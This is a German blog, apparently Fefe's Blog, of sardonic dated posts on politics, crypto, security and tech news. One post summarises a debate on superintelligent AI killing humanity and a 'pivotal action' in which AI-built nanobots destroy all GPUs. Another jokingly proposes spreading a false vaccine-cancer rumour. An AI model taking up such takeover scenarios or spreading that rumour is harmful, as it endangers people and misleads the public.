Ich kann kaum erwarten, wie blöde der Herr Justizminister guckt, wenn das mal irgendein Land dieser Welt mit ihm macht. Wie, na klar gibt es auf Sie einen Haftbefehl und wir haben der Deutschen Bank aufs Konto gegriffen, weil wir Ihr Konto nicht erreicht haben. Könnt ihr ja intern verrechnen. Na hören Sie mal, das stand letzte Woche im Ulan-Bator-Anzeiger! Da können wir ja wohl nichts für, wenn Sie den nicht lesen!1!!
Da haste doch spontan Vertrauen in den Rechtsstaat, wenn der zu solchen Methoden greift.
Ich frage mich ja, wieso die überhaupt finden, sie hätten Zuständigkeit oder Jurisdiktion über Telegram. Die Russen behaupten ja auch nicht, sie hätten Zuständigkeit und Jurisdiktion über Xing oder die Heise-Foren. Diese ganzen Truthähne in der Regierung sind so damit beschäftigt, einen auf dicke Hose zu machen, dass sie gar nicht merken, was dabei alles zu Bruch geht.
Hey! Habt ihr euch mal gefragt, wieso eine gammelige russische Chat-App mit fragwürdiger Pseudo-Krypto hier überhaupt einen Fuß auf den Boden gekriegt hat?
Weil ihr systematisch alles Vertrauen in Verschlüsselung und Sicherheit aus Deutschland kaputtgemacht habt. So sehr kaputt gemacht, dass die Leute lieber eine halbseidene unseriöse App aus Russland verwenden, um sich gegenseitig zu sagen, wie wenig sie euch noch vertrauen. Wenn ihr nicht seit Jahrzehnten herumfaseln würdet, dass ihr in unsere Kommunikation reinschnüffeln und uns Trojaner installieren wollt, dann hätte hier vielleicht ein Messenger entstehen können. Der hätte dann auch eine ladungsfähige Inlands-Anschrift gehabt.
Gut, dem wären dann spätestens beim NetzDG auch alle User weggelaufen. Ihr saugt ja systematisch den Sauerstoff aus dem Raum für Tech-Innovationen aus Deutschland. Da bleiben am Ende nur noch Werbeklitschen und Blockchain-Scammer übrig. Und Akademiker, die auf der verzweifelten Suche nach Forschungs-Drittmitteln was von KI faseln.
Geliefert wie bestellt.

Tue Jan 25 2022

[l] Ich frage mich gerade, ob die deutsche Abhängigkeit von russischem Gas vielleicht auch andere als wirtschaftliche Gründe hat.
Nach dem Zusammenbruch der Sowjetunion gab es einige Ängste im Westen, dass da jetzt vielleicht nervöse Militärs einen unruhigen Finger am Abzug haben würden. Der Verlust der Puffer-Republiken zwischen Russland und Deutschland wird sicher dem einen oder anderen Russen schlaflose Nächte bereitet haben.
Ich bilde mir ein, mal eine Geschichte gelesen zu haben, wo es um Tschernobyl ging. Neben Tschernobyl stand ja die Sende-Antenne des russischen Überhorizont-Radars, mit dem man Raketenangriffe frühzeitig erkennen konnte. Als dann Tschernobyl platzte, so die Geschichte, hätten die Amerikaner sich große Sorgen gemacht, dass die Russen ohne ihr Radar in Panik versehentlich irgendwas anderes als Angriff werten würden und haben große Zugeständnisse gemacht. Ich finde nur leider die Details nicht mehr. Ich glaube das war sogar Zugriff auf amerikanische Radardaten.
Jedenfalls... bei der EU war ja die Idee, dass man zukünftige Kriege vermeiden kann, wenn man die Staaten nur alle wirtschaftlich engmaschig genug verzahnt. Wenn alle gegenseitig voneinander abhängig sind, kann sich keiner einen Krieg leisten.
In das Muster hätte ja auch prima reingepasst, sich freiwillig von russischem Erdgas abhängig zu machen, um die Russen zu beruhigen, dass neuerliche militärische Konflikte von uns nicht zu befürchten sind.
Im Moment sieht man an einigen Stellen Einschätzungen ala "die doofen Deutschen haben sich so abhängig gemacht, dass sie Russland jetzt nicht glaubwürdig drohen können". Boris Johnson scheint das zu glauben.
Das kann man aber auch genau andersherum sehen. Unser System funktioniert. Das Ziel war, Krieg zu verhindern. Zumindest an der Stelle hat das Krieg verhindert.

Mon Jan 24 2022

[l] Ich brauche mal kurz eure Hilfe.
Es geht um das hier:
"Kurs halten" ist der Satz, den der Kanzler an diesem Abend am häufigsten sagt. Offenbar hat er ihn auch zum Motto dieser Bund-Länder-Schalte gemacht.
Ich bin verwirrt. Ich dachte, der Laschet war der Kurs-Halten-Kandidat.
Was war denn dann der Scholz? Auch Kurs Halten?
War die Wahl wie so eine Fake-Bushaltestelle vor einem Alzheimer-Altenheim?
Mich würde vor allem interessieren: Was glaubt der Scholz, was glaubt man in der SPD, was zu tun man gewählt wurde?
[l] Hey, kann man nicht sowas wie Bitcoin machen, aber statt Elektrizität verbrennt man Lebenszeit von Menschen?
Klar kann man! Nennt sich Play-to-earn!
Ob damit der Boden des Fasses der Unmoral erreicht ist? Was meint ihr? Findet jemand eine noch abstoßendere Idee?
Bevor ihr antwortet, lasst euch in dem Video erst mal erklären, wie unmoralisch dieses Schema jetzt schon ist. Play-to-earn ist natürlich eine Lüge. Mit Play hat das nichts zu tun. Es muss sogar absichtlich so gemacht werden, dass es keinen Spaß macht, sonst wäre das Kaufen des Ergebnisses ja nicht attraktiv.
Wer wäre so blöde, bei sowas mitzumachen? Na niemand. Hier. Im Westen. Aber in Entwicklungsländern gibt es Leute, die die paar potentiellen Dollar Gewinn attraktiv finden. Die haben natürlich nicht die Kohle, um da die initialen Kosten zu zahlen. Aber sorgt euch nicht. Dafür gibt es "Scholarships". Kein Scheiß. So nennt die eine Firma, die da immer als Vorreiter herumgereicht wird, das. Stipendium.
Unfassbar.
Update: Ist ein bisschen wie in der Matrix. Die Maschinen halten die Menschen in einer virtuellen Welt gefangen, um ihnen ihre Lebensenergie auszusagen. Nur dass man ihnen hier Geld entzieht und nicht direkt Energie.
Gut, auf der anderen Seite: So formuliert trifft das auch auf die meisten Berufe im Kapitalismus zu.
[l] Fnord der Woche:
Nachdem Australiens Premierminister Scott Morrison den Zugriff auf seinen WeChat-Account verloren hat, gibt es aus der Regierungspartei Zensurvorwürfe.
Zensur? In China?!? Niemals!!1!
Außerdem: Wie und warum hat er denn den Account überhaupt aufgemacht?
Oh ich sehe gerade, die App gibt es auch auf Englisch. Hmm. Bleibt immer noch die Warum-Frage.
[l] Kennt ihr den schon? Grundschule forkt Matrix-Client, passt ihn für eigene Bedürfnisse an?
Wie? Nein. Nicht Silicon Valley. Stolberg.
Das ist ein paar Kilometer östlich von Aachen.
Warte mal, war das nicht mitten im Hochwassergebiet? Ja, war es. Haben die trotzdem gemacht.
Was haben die denn da angepasst? Nun, in erster Linie ist die Zielgruppe Kinder, die noch nicht alle lesen und schrieben können. Also: Sprachnachrichten. Einfache Benutzerführung. Anmeldung mit QR-Code statt Text-Accountdaten. Sowas.
Wir hatten im Keller noch einen alten Verwaltungsserver, darauf habe ich CentOS installiert. Für die Installation vom Matrix-Server Synapse haben wir uns Hilfe von einem externen Admin geholt, der selbst eine große öffentliche Matrix-Instanz in Deutschland betreibt und nun auch unseren Server verwaltet. Mit ihm haben wir auch ganz DSGVO-Konform einen Auftragsverarbeitungsvertrag.
So und jetzt will ich keine Ausreden mehr hören. (Danke, Christian)

Sun Jan 23 2022

[l] Die gute Nachricht: Es gibt bei der Bundeswehr Leute, die die Ukraine-Situation realistisch sehen.
Die schlechte Nachricht: Die werden natürlich sofort rausgeschmissen. Was hat der Herr Schönbach, Admiral der Bundesmarine, denn so furchtbares gesagt, dass man ihn sofort rausschmeißen musste?
"Die Halbinsel Krim ist weg, sie wird nicht zurückkommen." Den von westlichen Staaten befürchteten Einmarsch russischer Truppen in die Ukraine bezeichnete er als "Nonsens". Was Russlands Präsident Wladimir Putin wirklich wolle, sei "Respekt auf Augenhöhe", sagte der Vizeadmiral. "Es ist leicht, ihm den Respekt zu geben, den er will - und den er wahrscheinlich auch verdient."
Oh ach so. Ja gut. Klar. Das geht natürlich gar nicht. Nicht bei den Grünen, die so tief in den Arsch der USA gekrochen sind, dass sie ihre Haare nicht mehr färben müssen. Es ist erstaunlich, dass man die überhaupt noch sehen kann, ohne selbst eine Tauchübung zu veranstalten.
Schnell: Was sind noch gleich die Credentials der Frau Verteidigungsministerin? Gucken wir doch mal schnell. Ah. Hm hmm. Justizministerin, dann für Familie, Senioren, Frauen und Jugend. Und was hat sie da gemacht, als Justizministerin? Oh, das Netzwerkdurchsetzunggesetz wollte sie verschärfen. Suuuuper. War die überhaupt schonmal in der Ukraine oder in Russland?
Ach, was sage ich da. Braucht sie doch gar nicht. Sie kennt doch den Feind, und er heißt Putin. Haben ihr ihre transatlantischen Freunde geflüstert. Und, frei nach Pispers, wenn der Feind bekannt ist, hat der Tag Struktur!
Update: Es gibt da noch ein paar Details zu. Erstens: "Mehr Offenheit".
Die Vorsitzende des Verteidigungsausschusses im Bundestag, Marie-Agnes Strack-Zimmermann, fordert mehr Offenheit von den Bundeswehrgenerälen im Verteidigungsministerium. „Ich persönlich wünsche mir von der Generalität im Ministerium insgesamt deutlich mehr Klarheit und weniger Geschwurbel“, sagte die FDP-Politikerin der Zeitung „Welt“.
Ich denke mal, jetzt wundert sich niemand mehr, wieso das mit dem Glasnost bei uns nicht klappt.
Zweitens: Der gute Herr Schönbach hat noch andere Dinge gesagt bei dem Anlass:
Schönbach hatte sich selbst zudem als »sehr radikalen römisch-katholischen Christen« bezeichnet. Er glaube an Gott und fände es deshalb gut, auf das christliche Russland als Partner gegen China zählen zu können: »Selbst wir, Indien, Deutschland, brauchen Russland, weil wir Russland gegen China brauchen«, so Schönbach, auch wenn Putin ein Atheist sei, »das ist egal. Dieses große Land, auch wenn es keine Demokratie ist, auf unserer Seite als bilateralen Partner zu haben, (…) hält möglicherweise Russland von China fern.«
Ich weiß ja nicht, wie ihr das seht, aber radikale Christen will ich bitte ganz weit fern von allen wichtigen Hebeln haben.

Fri Jan 21 2022

[l] Lacher des Tages: Google Creates Blockchain Unit, Hires New ‘Founding Leader’.
Die Älteren unter euch werden sich noch erinnern, als Google den anderen Firmen Schrecken einjagen konnte, weil sie klein und innovativ waren.
Früher sprang IBM auf, nachdem Google schon wieder abgesprungen ist. Heute macht Google etwas, nachdem IBM schon wieder abgesprungen ist.
Was für ein Absturz.
Gut, die haben ja seit Jahrzehnten schon niemanden mehr technisch beeindruckt. Die Suche wird immer nerviger, die Ergebnisse immer schlechter, sie belästigen einen ständig mit Cookie-Terrorbannern, einen Account für das Gucken von "für das Video hier muss man sich einloggen!1!!" kann man ohne Telefonnnummer gar nicht mehr anlegen, etcpp.
Wenn die in den Nachrichten sind, dann nur noch mit ihren ausgeklügelten Betrugsmaschen. Der Support ist so legendär schlecht, dass ihr Cloud-Angebot von einem Buchhändler plattgemacht wurde.
Google sind echt nur noch rauchende Ruinen ihrer selbst.
[l] Das heutzutage normale Verfahren nach einer Security-Schwankung ist ja, die Kriegsrhetorik rauszuholen. Hohe kriminelle Energie, staatliche Angreifer, Terroristen gar. Die Polizei und der Staatsschutz sind eingeschaltet.
Crypto.com fährt die andere Strategie.
Die Kryptobörse Crypto.com bestätigt Verluste durch nicht vollständig autorisierte Abbuchungen in Höhe von insgesamt 29 Millionen Euro. Im eigenen Bericht über die Vorfälle wird kein Hackerangriff erwähnt. Es heißt lediglich, dass eine Vielzahl plötzlicher Abbuchungen registriert wurde, die nicht durch 2-Faktor-Authentifizierung der Kunden bestätigt worden sei. Insgesamt waren 483 Konten betroffen.
Kleinere Datenbank-Unregelmäßigkeit. Angreifer? Welche Angreifer! Hier ist alles sicher!1!!
Da sieht man mal, was die für unverschämte Profite gemacht haben. Eigentlich ja nicht nachvollziehbar, wie bei einem dezentralen (!) System überhaupt Platz für derartige Geldabschöpfung sein kann. Der Punkt war ja gerade, dass a) kein Staat das regulieren kann und b) kein Kartell aus Banken dazwischen sitzt und abschöpft. Und was machen die Leute? Gehen alle freiwillig zu den neuen Banken und lassen die abschöpfen.
Na macht ihr mal alle.

Wed Jan 19 2022

[l] Zwischen Forschung und gelebter Realität gibt es ein spekulatives Substrat mit Gedankenexperimenten, auf dem man dann seine Kreativität ausleben kann, und dabei entscheidet sich dann, in welche Richtung man forschen will.
Bei der KI-Forschung gibt es eine Disziplin, die sich mit ethischer KI befasst, aber die ist hauptsächlich Wokeness-Feigenblatt. Eine andere Unterdisziplin geht da düsterer heran und sagt: Nehmen wir mal an, eines Tages baut jemand eine echte künstliche Intelligenz. Nicht nur eine glorifizierte Datenbank mit Gewichten an ihren Records. Eine echte künstliche Intelligenz, die dann ihre Intelligenz darauf anwenden kann, sich selbst zu verbessern, und die uns dann uneinholbar überlegen ist.
Die Experten sind sich nach Lektüre der einschlägigen Scifi-Literatur einig, dass so ein KI Overlord uns alle umbringen wird, weil wir ohne Not den Planeten kaputtmachen und uns sinnlos mit Atomwaffen aufgerüstet haben.
Bei dem wie immer großartigen Scott Alexander gab es jetzt eine Zusammenfassung einer Debatte aus dem Gebiet. Ich fasse mal die Zusammenfassung zusammen.
Der erste vorgeschlagene Lösungsansatz ist: Na dann bauen wir halt keine echte KI. Das funktioniert offensichtlich nicht, denn wir können ja nicht mal die Entwicklung von Landminen und Biowaffen verhindern.
Der nächste Ansatz war: OK, dann bauen wir halt nur "limitierte" KIs. Ein Schachcomputer kann nur über Probleme überhaupt nachdenken, die wie ein Schachproblem aussehen. Schachcomputer haben aber gezeigt, dass die "KI" (keine echte KI!) bei ihnen eine Superintelligenz werden kann, also schlauer als Menschen sein kann, ohne dass unsere Spezies dadurch in Gefahr ist.
Wenn man sich also auf solche "KIs" beschränken würde, dann hätte man das Problem vielleicht gar nicht. Der Ansatz sieht erstmal ganz gut aus, aber so richtig überzeugend ist das halt nicht. Denn wenn du über Superintelligenzen spekulierst, bist du halt schnell bei "Gottes Wege sind unergründlich", denn du musst davon ausgehen, dass die Superintelligenz Dinge tut, die du nicht verstehst, die aber schlauer sind als was du getan hättest. Daraus folgt im Grunde auch, dass du eine Superintelligenz nicht von einer doofen Intelligenz unterscheiden kannst, denn was sie tut erscheint nicht schlau für dich, denn du verstehst es nicht. Du könntest abwarten und beobachten, aber zu dem Zeitpunkt, an dem du erkennst, dass das eine Superintelligenz war, die uns alle umbringen will, ist es dann halt zu spät.
Also war der nächste Lösungsansatz, dass man eine limitierte Superintelligenz-KI damit beauftragt, eine Lösung zu finden. Man könnte die Lösung auch schon vorgeben. Das diskutierte Szenario aus Anschaulichkeitsgründen war, dass die selbstreplizierende KI Nanoroboter bauen soll, die auf einen Schlag alle GPUs auf der Welt zerstören. Grund: Die KI-Berechnungen finden größtenteils auf GPUs statt. Es geht dabei nicht um die Frage, ob das schlau ist, alle GPUs kaputtzumachen, sondern das ist bloß ein Beispiel für eine "pivotal action", also eine Art Abschreckungs-Superwaffe.
OK, soweit zur Vorgeschichte.
Am Rande in dem Artikel ist dann folgende Formulierung:
since then, we've only doubled down on our decision to gate trillions of dollars in untraceable assets behind a security system of "bet you can't solve this really hard math problem".
Meine Interpretation von dem Satz war: Er redet von Kryptographie. RSA und Elliptische Kurven sind harte mathematische Probleme, auf die viel Geld geworfen wird, und die unsere Assets schützen.
Aber jemand anderes interpretierte das als eine Anspielung auf Bitcoin.
Und das löst in meinem Kopf diese Idee aus, die mich aufgeregt herumhüpfen lässt, so schön finde ich sie als Scifi-Plot:
Jemand hat genau das gemacht. Hat eine KI damit beauftragt, eine Lösung zu finden, die Singularität hinauszuzögern bzw. zu verhindern. Möglichst ohne dabei die Weltwirtschaft zu vernichten.
Die KI heißt Satoshi und ihre Lösung war Bitcoin-Mining. Wenn man den Leuten wirtschaftliche Anreize gibt, ihre GPUs nicht für KI sondern für sinnloses Mining zu verbrennen, dann hat man die Singularität verzögert.
Bitcoin-Mining macht schon länger niemand mehr mit GPUs, aber es sind lauter andere Scam-Coins nachgezogen, die immer noch GPU-Zeit verbrennen.
Was, wenn Cryptocurrencies gar nicht bloß Scam sind, sondern das Überleben der Menschheit sichern? Klar machen sie auf dem Weg den Planet kaputt, aber da kann sich die Spezies raus-techen durch die Entwicklung eines Fusionskraftwerkes oder sowas!1!!
Das erklärt auch, wieso Satoshis Identität geheim bleiben musste. ~~Und so konnte auch Rokos Basilisk abgewehrt werden! (Wenn ihr das nicht kennt, wartet mit dem Googeln mal bis zum Freitag abend, das wird euch ein paar Tage beschäftigen)~~
Update: Vergesst Roku's Basilisk. Guckt das lieber nicht nach. Ich hätte das nicht erwähnen sollen.

Tue Jan 18 2022

[l] Liebe Leser, ihr müsst jetzt sehr tapfer sein.
Die Allianz hat mal Führungskräfte aus Unternehmen gefragt, was ihnen die größten Sorgen macht im Moment.
Inflation? Fachkräftemangel? Pandemie? The Great Resignation?
Nope. Nichts davon.
Gefährlicher als die Pandemie oder Naturkatastrophen: Fach- und Führungskräfte, die vom Versicherungskonzern Allianz befragt wurden, sehen Hackerangriffe und deren Folgen als Risiko Nummer eins für ihr Unternehmen.
Sag bloß! Scheiße, Bernd! Hätte uns doch nur jemand die letzten Jahrzehnte gewarnt, dass man in seine überlebenswichtige Infrastruktur investieren muss!1!!
Also DAMIT konnte ja wohl NIEMAND rechnen!
Besonders geil auch das Framing mal wieder. "Hackerangriffe". Nicht etwa "unsere verkackte Infrastruktur" oder "dass ich die letzten Jahre nichts investiert habe" oder "Sicherheit war bei uns halt nie Thema, da haben wir wohl Fehler gemacht". Nein, nein. "Hackerangriffe". Die bösen Hacker sind hier die Bedrohung. Nicht etwa dass es bei uns reinregnet, weil wir nie das Dach repariert haben.
[l] Hofftet ihr auch, dass das mit dem "Grünen Wasserstoff" neulich bloß ein Missverständnis war? Ein Übersetzungfehler vielleicht?
Ich meine, SO inkompetent und uninformiert können die Zuständigen doch unmöglich sein, dass die nicht wissen, dass Wasserstoff bloß ein Speichermechanismus ist, kein Stromerzeugungsmechanismus?
Das wäre als wenn man argumentiert, wir brauchen keinen Atomstrom, denn bei uns kommt der Strom aus der Steckdose.
Ach komm, Fefe, das war bloß die Flinten-Uschi. Die ist ja schon zur EU wegbefördert worden, weil sie in der Bundespolitik zu viel Schaden angerichtet hat.
Aber jetzt lese ich das hier und stelle mir gewisse unangenehme Fragen. Es geht um unsere Außenministerin (die mit dem Völkerrecht, wissenschon), die einen diplomatischen Besuch in der Ukraine gemacht hat.
“We will soon open a hydrogen diplomacy bureau in Kyiv in order to launch concrete projects as soon as possible,” German Foreign Minister Annalena Baerbock said at a joint press conference with Minister of Foreign Affairs of Ukraine Dmytro Kuleba in Kyiv, an Ukrinform correspondent reports.
Wat? Die Ukraine hängt doch genau so an der Zitze der Russen wie wir, eher noch mehr sogar! Wo sollen die denn Wasserstoff herholen?!
As noted, the energy cooperation between the two countries is a special, one of the central topics in terms of achieving the Paris climate goals, improving energy efficiency, strengthening energy sovereignty and energy independence. To do this, both countries need massive construction of renewable sources and the use of green hydrogen, the German Foreign Minister noted.
Wasserstoff ist nicht grün, ihr Vollpfosten! Wasserstoff wird aus einer Energiequelle generiert, unter massivem Verlust! Schon die Wirkquote der Umwandlung (bestenfalls 30% IIRC) macht das zu einer nicht-grünen Technologie.
Aber die meinen das ernst. Hier ist eine Stellenausschreibung der GIZ dazu. Moskau (!) wollen die erklären, dass sie lieber Wasserstoff als Erdgas exportieren sollen! Ich sträube mich, das zu fragen, aber wie genau soll Moskau das machen?
Ich sehe zwei Möglichkeiten: Entweder sie verbrennen ihre fossilen Energieträger und verkaufen uns 30% in Form von Wasserstoff weiter. Der Preis pro Energie müsste dann natürlich das Dreifache wie bei Erdgas sein, klar. Plus die Kosten für die Umwandlungswerke. Oder sie bauen ein paar mehr besonders sichere russische Atomkraftwerke und wir kriegen den Output davon in Form von Wasserstoff.
Beides ist ausgesprochen bescheuert. Dann baut lieber eine Stromtrasse und wir kaufen denen ihren Strom ab, das hat auch Wandlungsverluste, aber deutlich weniger.
Welcher Vollpfosten ist eigentlich für diesen Wasserstoffbullshit bei den Grünen zuständig? Ist das ein Homöopath, der glaubt, das Wasser erinnere sich an irgendwelche kosmischen Energien?!
Update: Bei den 30% hat mich mein Gedächtnis im Stich gelassen. Wikipedia sagt, der Wirkungsgrad für Wasserstofferzeugung per Elektrolyse liegt bei 80%. Das ändert aber natürlich nichts daran, dass der Energiemix in Russland und der Ukraine eher wenig regenerativ aussieht (wobei die Zahlen da schon älter sind). Die 30% waren eher für die gesamte Kette, aber das ist ein unfairer Vergleich, weil man bei Erdgas ja auch Verluste hat bei der Umwandlung in Strom.

Fri Jan 14 2022

[l] Angesichts dieser Story (Contentmafia verklagt Hoster, weil der die Homepage (nicht den Code oder die Downloads!) von youtube-dl hostet) frage ich mich gerade, wieso nicht mal jemand die Contentmafia verklagt.
Ich habe eine Firma. Ich habe Musik gehört. Das lenkte mich ab und senkte meine Produktivität. Ich möchte gerne Schadensersatz von Mia und sehe die Contentmafia in "Mittäterschaft, Gehilfen- sowie Störerhaftung", um mal deren eigenen beknackten Vorwürfe zu zitieren.
Das will ich sehen, wie die dann argumentieren, sie hätten ja bloß die Musik gemacht und könnten nichts dafür, dass die Leute das während der Arbeit hören. Das sei ja wohl ganz klar Sache des Einzelnen, wie er das hört. Für Produktivitätsausfälle könnten sie nichts, und im Übrigen gäbe es ja auch Fälle, wo das nachweislich die Produktivität gesteigert hätte.
Alleine um die das sagen zu hören würde sich so eine Klage lohnen, finde ich.

Thu Jan 13 2022

[l] In Bayern haben sie einen Arzt gefunden, der angeblich Impfzertifikate ohne Impfung ausgestellt haben soll.
Der Fall liest sich, als wolle der Rechtsstaat da ein Exempel statuieren. Der Mann hat jetzt Berufsverbot und sie haben bei über 100 Patienten von dem eine Hausdurchsuchung gemacht.
Ich finde das ja auch fies, gemein und verwerflich, aber ... 100 Hausdurchsuchungen? Sicher, dass da die Verhältnismäßigkeit gewahrt bleibt? Sicher, dass da nicht ein Staatsanwalt auf Kosten der Querdenker fett Karriere machen will?
Nicht dass ich das für ein Kavaliersdelikt halte. Aber 100 Hausdurchsuchungen! Das kostet den Steuerzahler doch mehr als da an Strafen zu erwarten ist, oder nicht?
Und wieso überhaupt Hausdurchsuchungen? Kann man die nicht einfach vorladen, und sie sollen ihr Impfbuch mitbringen? Wer keines vorweisen kann, obwohl er bei dem Arzt in den Unterlagen für Impfung steht, der hat halt seine Chance für Entkräftung der Vorwürfe nicht genutzt und wird verurteilt. Oder bin ich da juristisch zu naiv?
Ich weiß ja nicht, wie ihr das seht, aber eine Hausdurchsuchung ist auf der Skala der Grundrechtseingriffe so ziemlich das übelste, was so ein Rechtsstaat anrichten kann. Das sollte man sparsam einsetzen, finde ich.
Man hört ja auch immer wieder, dass Leute von Einbrüchen jahrelang traumatisiert sind, und sich in ihrer Wohnung nicht mehr sicher fühlen. Wie schlimm ist denn das erst nach einer Hausdurchsuchung?!
Update: Schlimmer wäre ja fast nur noch, wenn man den Leuten ungefragt Blut abnimmt!
Oh, warte...
Zudem wurde bei den Verdächtigen Blut entnommen, wie ein Sprecher der Polizei erklärte. Über einen Antikörper-Test will man nachweisen, dass sie nicht geimpft sind.
Hey, mit der Rigorosität sollte man auch mal im Bundestag nach Drogen suchen. Verdacht ist ja wohl hinreichend begründet, weil es vor ein paar Jahren mal die Untersuchung der Klos dort gab. Einfach mal bei allen ein paar Hausdurchsuchungen und Blut abnehmen.

Wed Jan 12 2022

[l] Kim Kardashian und Floyd Mayweather Jr. haben Stress mit der Justiz. Sie hatten Werbung für Cryptoscammer gemacht.
Angestoßen hatte die Klage ein Anleger aus New York, der mit der Kryptowährung Emax Geld verloren hatte. Später hatten sich viele weitere Geschädigte dem Verfahren angeschlossen, die von Mitte Mai bis Ende Juni 2021 Emax-Token gekauft hatten. Sie verlangen die Rückerstattung ihrer Verluste und die Abschöpfung der Gewinne, die Kardashian und Floyd Mayweather Jr. erzielt haben.
Ich finde ja, zuerst sollte man die Scammer einbuchten. Aber ich habe überhaupt nichts dagegen, auch die "Influencer" aus dem Verkehr zu ziehen, die für sowas Werbung gemacht haben.

Mon Jan 10 2022

[l] Wie sehen Amerikaner die Polizei? Hier hat mal jemand ne Umfrage gemacht. Ergebnis:
Most White respondents felt safe, but most Black respondents lived in fear of the police killing them and hurting their family members. Approximately half of Black respondents preferred to be robbed or burglarized than to have unprovoked contact with officers.
Nee, Schatz, ruf lieber nicht die Polizei. Da haben wir von den bewaffneten Räubern auf Crack weniger Schaden zu erwarten!
Weia.

Thu Jan 6 2022

[l] Bei den Schwurblern in den USA gibt es gerade eine fette Hysterie. Die glauben alle, die Impfung hätte ihnen oder Bekannten von ihnen Herzprobleme gemacht.
Ich glaube, das ist eine einmalige Chance.
Die meisten von denen sind Hörensagen, "ich habe gehört"-Selbstdiagnosen und Hypochonder, aber einige sind echt zum Arzt gegangen und der hat echt was gefunden.
Das finde ich eine sehr positive Entwicklung. Herzinfarkt ist in westlichen Industrienationen eine der häufigsten Todesursachen. Wenn die Leute rechtzeitig zur Früherkennung gehen würden, könnte man da richtig viele Leben retten.
Jemand sollte das Gerücht streuen, dass man von der Covid-Impfung Krebs kriegen kann. Wenn alles gut geht, rennen die Schwurbler alle zum Krebs-Screening.
Was man da für Menschenleben retten könnte!
Es gibt da doch sicher irgendwo eine Liste an Dingen, an denen Leute unnötig sterben, obwohl es eine gute Früherkennung gibt. Was steht da so drauf? Weiß das jemand? Diabetes vielleicht? HPV?
[l] In Kasachstan gab es Unruhen, also hat der Dikt... äh... Präsident mal kurz das Internet ausgeschaltet.
Wieso erzähle ich euch das?
Nun, weil China doch einen Crackdown gegen Bitcoin und co gemacht hat. Die hatten keinen Bock, ihre Klimaziele nicht zu erreichen, weil lauter Hirnrissige den Strom sinnlos für Mining verbraten.
Also sind viele Miner aus China nach Kasachstan abgewandert, die sie auch mit offenen Armen empfangen haben und sogar ein neues Atomkraftwerk für sie bauen will.
Tja, und Mining ist ja ein Wettlauf, wer als erster einen Hash ausprobiert hat, der bestimmte Eigenschaften hat. Wenn du den Hash dann nicht melden kannst, ist das etwas hinderlich. So brachen dann auch die Mining-Raten und die Kurse ein.
Nur falls jemand dachte, 2022 wird weniger bizarr als 2021.

Fri Dec 31 2021

[l] Schöne Metapher über das Internet: Versucht mal herauszufinden, wie man Oort Cloud auf Englisch ausspricht. Auf Deutsch ist das die Oortsche Wolke, ein Begriff aus der Astronomie.
Ich komme drauf, weil ich gerade Don't Look Up auf Netflix geguckt habe, wo das am Rande vorkommt. Leonardo DiCaprio spielt einen Professor, dessen Doktorandin einen Kometen entdeckt, der auf die Erde zufliegt und uns alle umbringen wird. Der Komet kommt aus der Oortschen Wolke.
Er spricht das aus, wie man das als Laie vermuten würde, wie ein langes U auf Deutsch. Uurt Klaud.
Nun ist aber die Oortsche Wolke nach einem niederländischen Astronomen benannt. Ich weiß, es ist schäbig, sich über solchen Scheiß aufzuregen, aber das sind so die Dinge, die bei mir Filme kaputtmachen. Ein Astronomieprofessor würde wissen, wie man das ausspricht.
So und jetzt warum ich das blogge: Versucht mal mit einer Suchmaschine eurer Wahl herauszufinden, wie man das ausspricht. Da findet man ein Dutzend Sites, die Videos hochgeladen haben, wie man das angeblich ausspricht, am besten noch mit einer Computer-Sprachausgabe. So schön habe ich lange nicht mehr visualisiert gesehen, was für ein Scheiß diese Kommerzialisierung und das Aufmerksamkeitsgeheische ist, und am besten noch ein "stimmen Sie hier ab, welches die richtige Aussprache ist" (wenn ich das wüsste, wäre ich nicht hier, ihr Vollpfosten!). Keiner von denen wollte euch helfen, das richtig auszusprechen. Die wollten alle bloß Werbung verkaufen.
Eine ähnliche Falle, aber diesmal auch für Deutsche, ist übrigens der Kuiper Belt, ebenfalls benannt nach einem Niederländer. Das spricht man Kaiper aus.
Hier hat die NASA ein Video gemacht, wo sie beides korrekt aussprechen. :-)
Das ist auch in Videospielen gelegentlich ein Problem, weil da die Vertonung halt von irgendwelchen angeheuerten Schauspielern gemacht werden, die das auch nicht wissen, wie man das richtig ausspricht. Ich hab ne Weile obsessiv X3 gezockt, von einer deutschen Firma entwickelt, aber die englische Version gespielt, und da haben sie Oort und Kuiper falsch ausgesprochen. Da haben sich offenbar ein paar OCD-Fans beschwert und in X4 ist es dann korrigiert worden.
Wer auf diese Art von Pedanterie steht, wird sich bestimmt auch über Neil DeGrasse Tyson freuen, dem im Film Titanic auffiel, dass der CGI-Himmel falsch war, und der daraufhin einen bösen Brief an James Cameron schrieb.
Bei der englischen Wikipedia gibt es eine Aussprachehilfe: /ɔːrt, ʊərt/
Als Referenz dafür nehmen sie das Oxford English Dictionary. Und die haben offenbar gesagt, dass beide Aussprachen OK sind. *grunz* Ich kann so nicht arbeiten!!1!
Update: Ich sollte vielleicht noch sagen, wie ich Don't Look Up fand. Es ist kein neues Wag The Dog. Ich hatte Spaß, so ist das nicht. Aber wo Wag The Dog dem Zuschauer zeigt, welche Kräfte wirken, wie stark und aus welcher Richtung, und warum passiert, was passiert, zeigt Don't Look Up bloß, dass die Leute alls dumm, apathisch und bösartig sind. Gelernt hat man am Ende nichts.
Update: Haha, war ja klar, jetzt hab ich hier die Inbox voll. Ist ja auch ein tolles Bikeshedding-Thema, hat jeder eine Meinung zu. :-)
Der Vollständigkeit halber: Merriam-Webster hat Aussprache-Beispielsounds und stimmt mir bei der Aussprache inhaltlich zu. Allerdings haben mir mehrere Leute geschrieben, dass ui im niederländischen Original doch nicht wie ai im Deutschen klingt. Eher öy oder aü. Hier spricht ganz am Anfang André Kuipers seinen Namen aus und ich hätte schwören können, dass das wie Kaipers klingt.

Thu Dec 30 2021

[l] Mehrere Leser haben mir diese Story geschickt. Raymond Chen (Microsoft) erzählt von einem Kunden, der Code in einen anderen Prozess injecten wollte. Dafür hat er nicht gemacht, was andere Leute machen würden, nämlich LoadLibrary. Nein. Er hat VirtualAlloc gemacht und dann per memcpy Code von seinem eigenen Prozess dort reinkopiert. Natürlich stimmten dann die Offsets alle nicht und Exception-Handling-Metadaten fehlten und das platzte.
Daraufhin hat der Kunde bei Microsoft herumgemeckert. Microsoft hat ihnen dann erklärt, dass das so nicht funktionieren kann. Und außerdem macht man das so nicht, das sieht ja aus wie etwas, das ein Virus machen würde.
Daraufhin der Kunde so:
The customer liaison explained that it’s quite the opposite: The customer is a major anti-virus software vendor! The customer has important functionality in their product that that they have built based on this technique of remote code injection, and they cannot afford to give it up at this point.
